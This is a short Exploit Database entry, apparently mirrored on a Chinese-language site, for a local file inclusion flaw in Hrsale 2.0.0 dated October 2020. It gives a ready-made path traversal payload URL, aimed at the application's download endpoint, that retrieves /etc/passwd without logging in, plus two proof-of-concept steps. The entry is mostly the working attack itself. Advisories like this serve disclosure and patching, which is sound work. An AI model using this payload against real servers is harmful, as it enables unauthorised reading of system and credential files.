Hrsale 2.0.0 – Local File Inclusion

• Exploit Database
• 18 阅读

• 作者： Sosecure
  日期： 2020-10-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48920/

• # Exploit Title: Hrsale 2.0.0 - Local File Inclusion
  # Date: 10/21/2020
  # Exploit Author: Sosecure
  # Vendor Homepage: https://hrsale.com/index.php
  # Version: version 2.0.0
  
  Description:
  This exploit allow you to download any readable file from server with out permission and login session.
  
  Payload :
   https://hrsale/download?type=files&filename=../../../../../../../../etc/passwd
  POC:
  
  1.Access to HRsale application and browse to download path with payload
  2.Get /etc/passwd